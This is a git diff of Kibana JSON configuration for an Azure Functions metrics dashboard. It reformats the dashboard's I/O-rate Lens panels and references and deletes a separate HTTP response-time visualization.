"adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "0efd9b40-6f73-459b-8a6d-22bb9ea9f8f5": { - "columnOrder": [ - "bf621d88-b10b-4d8b-86fc-33034ed0fdc9", - "e2344323-fc84-49dc-9a63-ff7cc0ac618a", - "017dace0-c878-45e7-8d98-bfba5bdade86" - ], - "columns": { - "017dace0-c878-45e7-8d98-bfba5bdade86": { - "dataType": "number", - "isBucketed": false, - "label": "Sum of azure.functions.io_write_bytes_per_second.total", - "operationType": "sum", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 0 - } - } - }, - "scale": "ratio", - "sourceField": "azure.functions.io_write_bytes_per_second.total" - }, - "bf621d88-b10b-4d8b-86fc-33034ed0fdc9": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of azure.resource.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "017dace0-c878-45e7-8d98-bfba5bdade86", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "azure.resource.name" - }, - "e2344323-fc84-49dc-9a63-ff7cc0ac618a": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } - } - }, - "textBased": { - "layers": {} - } + }, + "scale": "ratio", + "sourceField": "azure.functions.io_write_bytes_per_second.total" + }, + "bf621d88-b10b-4d8b-86fc-33034ed0fdc9": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of azure.resource.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": 
false, + "missingBucket": false, + "orderBy": { + "columnId": "017dace0-c878-45e7-8d98-bfba5bdade86", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "017dace0-c878-45e7-8d98-bfba5bdade86" - ], - "layerId": "0efd9b40-6f73-459b-8a6d-22bb9ea9f8f5", - "layerType": "data", - "position": "top", - "seriesType": "bar_stacked", - "showGridlines": false, - "splitAccessor": "bf621d88-b10b-4d8b-86fc-33034ed0fdc9", - "xAccessor": "e2344323-fc84-49dc-9a63-ff7cc0ac618a" - } - ], - "legend": { - "isVisible": true, - "position": "bottom" - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide" - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "azure.resource.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "description": "The rate at which the app process is writing bytes to I/O operations.", - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 15, - "i": "ba3dfc7e-d929-4dac-ba7e-d979652ec83a", - "w": 24, - "x": 24, - "y": 59 - }, - "panelIndex": "ba3dfc7e-d929-4dac-ba7e-d979652ec83a", - "title": "IO Write Bytes Per Second", - "type": "lens", - "version": "8.7.1" + "e2344323-fc84-49dc-9a63-ff7cc0ac618a": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + 
"sourceField": "@timestamp" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "017dace0-c878-45e7-8d98-bfba5bdade86" + ], + "layerId": "0efd9b40-6f73-459b-8a6d-22bb9ea9f8f5", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "bf621d88-b10b-4d8b-86fc-33034ed0fdc9", + "xAccessor": "e2344323-fc84-49dc-9a63-ff7cc0ac618a" + } + ], + "legend": { + "isVisible": true, + "position": "bottom" + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "The rate at which the app process is issuing read I/O operations.", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-e16f3e88-0dc5-490a-b45d-86b3dbd359a3", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "description": "The rate at which the app process is writing bytes to I/O operations.", + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "ba3dfc7e-d929-4dac-ba7e-d979652ec83a", + "w": 24, + "x": 24, + "y": 59 + }, + "panelIndex": "ba3dfc7e-d929-4dac-ba7e-d979652ec83a", + "title": "IO Write Bytes Per Second", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "The rate at which the app process is issuing read I/O operations.", + 
"references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-e16f3e88-0dc5-490a-b45d-86b3dbd359a3", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "e16f3e88-0dc5-490a-b45d-86b3dbd359a3": { + "columnOrder": [ + "c5f39387-452a-4a77-8c48-831ecf41d972", + "d59f84c1-e509-4b82-bb73-8b30500124ec", + "32a41b5b-b737-4fd0-8b22-4a009d9c5555" + ], + "columns": { + "32a41b5b-b737-4fd0-8b22-4a009d9c5555": { + "dataType": "number", + "isBucketed": false, + "label": "Sum of azure.functions.io_read_operations_per_second.total", + "operationType": "sum", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 0, + "suffix": "/s" + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "e16f3e88-0dc5-490a-b45d-86b3dbd359a3": { - "columnOrder": [ - "c5f39387-452a-4a77-8c48-831ecf41d972", - "d59f84c1-e509-4b82-bb73-8b30500124ec", - "32a41b5b-b737-4fd0-8b22-4a009d9c5555" - ], - "columns": { - "32a41b5b-b737-4fd0-8b22-4a009d9c5555": { - "dataType": "number", - "isBucketed": false, - "label": "Sum of azure.functions.io_read_operations_per_second.total", - "operationType": "sum", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 0, - "suffix": "/s" - } - } - }, - "scale": "ratio", - "sourceField": "azure.functions.io_read_operations_per_second.total" - }, - "c5f39387-452a-4a77-8c48-831ecf41d972": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of azure.resource.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "32a41b5b-b737-4fd0-8b22-4a009d9c5555", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": 
"ordinal", - "sourceField": "azure.resource.name" - }, - "d59f84c1-e509-4b82-bb73-8b30500124ec": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } - } - }, - "textBased": { - "layers": {} - } + }, + "scale": "ratio", + "sourceField": "azure.functions.io_read_operations_per_second.total" + }, + "c5f39387-452a-4a77-8c48-831ecf41d972": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of azure.resource.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "32a41b5b-b737-4fd0-8b22-4a009d9c5555", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "32a41b5b-b737-4fd0-8b22-4a009d9c5555" - ], - "layerId": "e16f3e88-0dc5-490a-b45d-86b3dbd359a3", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "c5f39387-452a-4a77-8c48-831ecf41d972", - "xAccessor": "d59f84c1-e509-4b82-bb73-8b30500124ec" - } - ], - "legend": { - "isVisible": true, - "position": "bottom" - }, - "preferredSeriesType": "line", - "showCurrentTimeMarker": false, - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - 
"valueLabels": "hide" - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "azure.resource.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "description": "The rate at which the app process is issuing read I/O operations.", - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 15, - "i": "dc27d0ce-7296-4640-8bcd-d23a8f4830ab", - "w": 24, - "x": 0, - "y": 74 - }, - "panelIndex": "dc27d0ce-7296-4640-8bcd-d23a8f4830ab", - "title": "IO Read Operations Per Second", - "type": "lens", - "version": "8.7.1" + "d59f84c1-e509-4b82-bb73-8b30500124ec": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "32a41b5b-b737-4fd0-8b22-4a009d9c5555" + ], + "layerId": "e16f3e88-0dc5-490a-b45d-86b3dbd359a3", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "c5f39387-452a-4a77-8c48-831ecf41d972", + "xAccessor": "d59f84c1-e509-4b82-bb73-8b30500124ec" + } + ], + "legend": { + "isVisible": true, + "position": "bottom" + }, + "preferredSeriesType": "line", + "showCurrentTimeMarker": false, + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } }, - { - "embeddableConfig": { - 
"attributes": { - "description": "The rate at which the app process is issuing wite I/O operations.", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-effd480b-5d45-4c7e-9883-114e91117829", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "description": "The rate at which the app process is issuing read I/O operations.", + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "dc27d0ce-7296-4640-8bcd-d23a8f4830ab", + "w": 24, + "x": 0, + "y": 74 + }, + "panelIndex": "dc27d0ce-7296-4640-8bcd-d23a8f4830ab", + "title": "IO Read Operations Per Second", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "The rate at which the app process is issuing wite I/O operations.", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-effd480b-5d45-4c7e-9883-114e91117829", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "effd480b-5d45-4c7e-9883-114e91117829": { + "columnOrder": [ + "62dfa6f9-8995-4b01-8038-0a32c921ce4e", + "fb0c0a99-931d-407b-90e1-a7695f4e877a", + "4ff3447e-d940-4369-8cec-7f6ef83dd20f" + ], + "columns": { + "4ff3447e-d940-4369-8cec-7f6ef83dd20f": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Sum of azure.functions.io_write_operations_per_second.total", + "operationType": "sum", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 0, + "suffix": "/s" + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "effd480b-5d45-4c7e-9883-114e91117829": { - "columnOrder": [ - "62dfa6f9-8995-4b01-8038-0a32c921ce4e", - "fb0c0a99-931d-407b-90e1-a7695f4e877a", - "4ff3447e-d940-4369-8cec-7f6ef83dd20f" - ], - "columns": { - "4ff3447e-d940-4369-8cec-7f6ef83dd20f": { - 
"customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Sum of azure.functions.io_write_operations_per_second.total", - "operationType": "sum", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 0, - "suffix": "/s" - } - } - }, - "scale": "ratio", - "sourceField": "azure.functions.io_write_operations_per_second.total" - }, - "62dfa6f9-8995-4b01-8038-0a32c921ce4e": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of azure.resource.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "4ff3447e-d940-4369-8cec-7f6ef83dd20f", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "azure.resource.name" - }, - "fb0c0a99-931d-407b-90e1-a7695f4e877a": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } - } - }, - "textBased": { - "layers": {} - } + }, + "scale": "ratio", + "sourceField": "azure.functions.io_write_operations_per_second.total" + }, + "62dfa6f9-8995-4b01-8038-0a32c921ce4e": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of azure.resource.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "4ff3447e-d940-4369-8cec-7f6ef83dd20f", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + 
"parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "4ff3447e-d940-4369-8cec-7f6ef83dd20f" - ], - "layerId": "effd480b-5d45-4c7e-9883-114e91117829", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "62dfa6f9-8995-4b01-8038-0a32c921ce4e", - "xAccessor": "fb0c0a99-931d-407b-90e1-a7695f4e877a" - } - ], - "legend": { - "isVisible": true, - "position": "bottom" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide" - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "azure.resource.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "description": "The rate at which the app process is issuing wite I/O operations.", - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 15, - "i": "f907a3c8-a7aa-4cb8-8708-e316bb3cdeb6", - "w": 24, - "x": 24, - "y": 74 - }, - "panelIndex": "f907a3c8-a7aa-4cb8-8708-e316bb3cdeb6", - "title": "IO Write Operations Per Second", - "type": "lens", - "version": "8.7.1" - } - ], - "timeRestore": false, - "title": "[Azure Functions] Overview", - "version": 1 - }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-08-25T09:01:59.889Z", - "id": "azure_functions-5b40c9c0-33d4-11ee-8d85-2d7adebebd1b", - "migrationVersion": { - "dashboard": "8.7.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "58a522e8-acf6-4ad1-a5cc-a699ce9c26c0:indexpattern-datasource-layer-f6c3c469-2e64-4120-b144-997fb70575e2", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": 
"b9d5606f-9607-4c90-a75f-c2857b266bfa:indexpattern-datasource-layer-113434b9-c581-4b79-9344-13864154c598", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "b9d5606f-9607-4c90-a75f-c2857b266bfa:60014cf3-d9b4-46e8-ae69-999d31086fbc", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "44c459b4-623b-4534-ba78-8904669ae9cb:indexpattern-datasource-layer-8e323fe9-19c2-405d-bbf6-ba61dc9a190f", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "9196bdde-1f73-46f5-97f6-09db15a28b61:indexpattern-datasource-layer-b0c25d59-67fb-4970-8b15-1da58db41925", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "5430e8a9-47ae-4c82-96b7-b0287026409f:indexpattern-datasource-layer-4689dc73-dc78-4c03-b975-62264d68c33b", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "7a4bc820-cc0e-40fb-9aee-83ccf7615fa2:indexpattern-datasource-layer-54edca01-9fb6-444a-8d98-ddb0ff36f9be", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "266a1bc1-c35b-4959-96c1-5d799a98754c:indexpattern-datasource-layer-419ba4b9-c54a-4e44-b7dc-475a2b04e4a8", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "5ef0d281-2eff-415a-ac37-d778985db835:indexpattern-datasource-layer-8d0f0cfa-b115-4100-ba7e-1cadee108055", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "4f589bdd-7bbf-4b5e-88f7-68272155780d:indexpattern-datasource-layer-750303c4-2d5f-4b67-8018-cba6ccc3e3f8", - "type": "index-pattern" - }, - { - "id": "azure_functions-7f0826e0-33b2-11ee-8d85-2d7adebebd1b", - "name": "96b12503-3f63-4f80-9419-f8d25b7356fc:panel_96b12503-3f63-4f80-9419-f8d25b7356fc", - "type": "lens" - }, - { - "id": "metrics-*", - "name": "578f6fe3-6edb-4678-b13c-1e9510f1942b:indexpattern-datasource-layer-fa95f5df-3ddf-44ed-88b8-793641935e0a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "f7c59600-cc99-4d51-b8f8-20976818476a:indexpattern-datasource-layer-cc027ebf-f1dc-44ef-8907-7b7a407a7fe0", - "type": 
"index-pattern" - }, - { - "id": "metrics-*", - "name": "ba3dfc7e-d929-4dac-ba7e-d979652ec83a:indexpattern-datasource-layer-0efd9b40-6f73-459b-8a6d-22bb9ea9f8f5", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "dc27d0ce-7296-4640-8bcd-d23a8f4830ab:indexpattern-datasource-layer-e16f3e88-0dc5-490a-b45d-86b3dbd359a3", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "f907a3c8-a7aa-4cb8-8708-e316bb3cdeb6:indexpattern-datasource-layer-effd480b-5d45-4c7e-9883-114e91117829", - "type": "index-pattern" + "fb0c0a99-931d-407b-90e1-a7695f4e877a": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "4ff3447e-d940-4369-8cec-7f6ef83dd20f" + ], + "layerId": "effd480b-5d45-4c7e-9883-114e91117829", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "62dfa6f9-8995-4b01-8038-0a32c921ce4e", + "xAccessor": "fb0c0a99-931d-407b-90e1-a7695f4e877a" + } + ], + "legend": { + "isVisible": true, + "position": "bottom" + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "description": "The rate at 
which the app process is issuing wite I/O operations.", + "enhancements": {}, + "hidePanelTitles": false }, - { - "id": "metrics-*", - "name": "controlGroup_ff8243f3-9c96-4cb0-b703-0af0107bc8f7:optionsListDataView", - "type": "index-pattern" + "gridData": { + "h": 15, + "i": "f907a3c8-a7aa-4cb8-8708-e316bb3cdeb6", + "w": 24, + "x": 24, + "y": 74 }, - { - "id": "metrics-*", - "name": "controlGroup_bebd2bf5-eb88-4157-b86b-e6fd9e322b13:optionsListDataView", - "type": "index-pattern" - } + "panelIndex": "f907a3c8-a7aa-4cb8-8708-e316bb3cdeb6", + "title": "IO Write Operations Per Second", + "type": "lens", + "version": "8.7.1" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Azure Functions] Overview", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "58a522e8-acf6-4ad1-a5cc-a699ce9c26c0:indexpattern-datasource-layer-f6c3c469-2e64-4120-b144-997fb70575e2", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "b9d5606f-9607-4c90-a75f-c2857b266bfa:indexpattern-datasource-layer-113434b9-c581-4b79-9344-13864154c598", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "b9d5606f-9607-4c90-a75f-c2857b266bfa:60014cf3-d9b4-46e8-ae69-999d31086fbc", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "44c459b4-623b-4534-ba78-8904669ae9cb:indexpattern-datasource-layer-8e323fe9-19c2-405d-bbf6-ba61dc9a190f", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "9196bdde-1f73-46f5-97f6-09db15a28b61:indexpattern-datasource-layer-b0c25d59-67fb-4970-8b15-1da58db41925", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "5430e8a9-47ae-4c82-96b7-b0287026409f:indexpattern-datasource-layer-4689dc73-dc78-4c03-b975-62264d68c33b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "7a4bc820-cc0e-40fb-9aee-83ccf7615fa2:indexpattern-datasource-layer-54edca01-9fb6-444a-8d98-ddb0ff36f9be", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": 
"266a1bc1-c35b-4959-96c1-5d799a98754c:indexpattern-datasource-layer-419ba4b9-c54a-4e44-b7dc-475a2b04e4a8", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "5ef0d281-2eff-415a-ac37-d778985db835:indexpattern-datasource-layer-8d0f0cfa-b115-4100-ba7e-1cadee108055", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "4f589bdd-7bbf-4b5e-88f7-68272155780d:indexpattern-datasource-layer-750303c4-2d5f-4b67-8018-cba6ccc3e3f8", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "578f6fe3-6edb-4678-b13c-1e9510f1942b:indexpattern-datasource-layer-fa95f5df-3ddf-44ed-88b8-793641935e0a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f7c59600-cc99-4d51-b8f8-20976818476a:indexpattern-datasource-layer-cc027ebf-f1dc-44ef-8907-7b7a407a7fe0", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ba3dfc7e-d929-4dac-ba7e-d979652ec83a:indexpattern-datasource-layer-0efd9b40-6f73-459b-8a6d-22bb9ea9f8f5", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "dc27d0ce-7296-4640-8bcd-d23a8f4830ab:indexpattern-datasource-layer-e16f3e88-0dc5-490a-b45d-86b3dbd359a3", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f907a3c8-a7aa-4cb8-8708-e316bb3cdeb6:indexpattern-datasource-layer-effd480b-5d45-4c7e-9883-114e91117829", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_ff8243f3-9c96-4cb0-b703-0af0107bc8f7:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_bebd2bf5-eb88-4157-b86b-e6fd9e322b13:optionsListDataView", + "type": "index-pattern" + }, + { + "type": "index-pattern", + "name": "96b12503-3f63-4f80-9419-f8d25b7356fc:indexpattern-datasource-layer-5e26da41-85b9-4f3d-b666-9b027f19f4c0", + "id": "metrics-*" + } + ], + "managed": false } \ No newline at end of file 
diff --git a/packages/azure_functions/kibana/lens/azure_functions-1e62d580-3491-11ee-8d85-2d7adebebd1b.json b/packages/azure_functions/kibana/lens/azure_functions-1e62d580-3491-11ee-8d85-2d7adebebd1b.json
deleted file mode 100644
index b3216f8e59d..00000000000
--- a/packages/azure_functions/kibana/lens/azure_functions-1e62d580-3491-11ee-8d85-2d7adebebd1b.json
+++ /dev/null
@@ -1,186 +0,0 @@ -{ - "attributes": { - "description": "", - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "59e32faf-6efe-4b99-806e-0022e95bfe71": { - "columnOrder": [ - "b6caccad-3379-41e0-a011-efd0aa4c0268", - "de1705b8-3559-46ee-be47-0998ab9e9ce0", - "51003b73-f78c-4ed2-8e9a-d5e6d7d23239" - ], - "columns": { - "51003b73-f78c-4ed2-8e9a-d5e6d7d23239": { - "dataType": "number", - "filter": { - "language": "kuery", - "query": "azure.metrics.http_response_time.avg: *" - }, - "isBucketed": false, - "label": "Average of azure.functions.http_response_time.avg", - "operationType": "average", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "azure.functions.http_response_time.avg" - }, - "b6caccad-3379-41e0-a011-efd0aa4c0268": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of azure.resource.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "51003b73-f78c-4ed2-8e9a-d5e6d7d23239", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "azure.resource.name" - }, - "de1705b8-3559-46ee-be47-0998ab9e9ce0": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } - } - }, - "textBased": { - "layers": {} - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": "azure.metrics.http_response_time.avg: *", - "disabled": false, - "index": "0b109d13-9358-4287-8292-7924e980f073", - "key": "query", - "negate": false, - "type": "custom", - "value": 
"{\"bool\":{\"filter\":[{\"bool\":{\"minimum_should_match\":1,\"should\":[{\"exists\":{\"field\":\"azure.metrics.http_response_time.avg\"}}]}}],\"must\":[],\"must_not\":[],\"should\":[]}}" - }, - "query": { - "bool": { - "filter": [ - { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "exists": { - "field": "azure.metrics.http_response_time.avg" - } - } - ] - } - } - ], - "must": [], - "must_not": [], - "should": [] - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "data_stream.dataset : \"azure.function\" " - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "51003b73-f78c-4ed2-8e9a-d5e6d7d23239" - ], - "collapseFn": "", - "layerId": "59e32faf-6efe-4b99-806e-0022e95bfe71", - "layerType": "data", - "seriesType": "line", - "splitAccessor": "b6caccad-3379-41e0-a011-efd0aa4c0268", - "xAccessor": "de1705b8-3559-46ee-be47-0998ab9e9ce0" - } - ], - "legend": { - "isVisible": true, - "position": "bottom" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide" 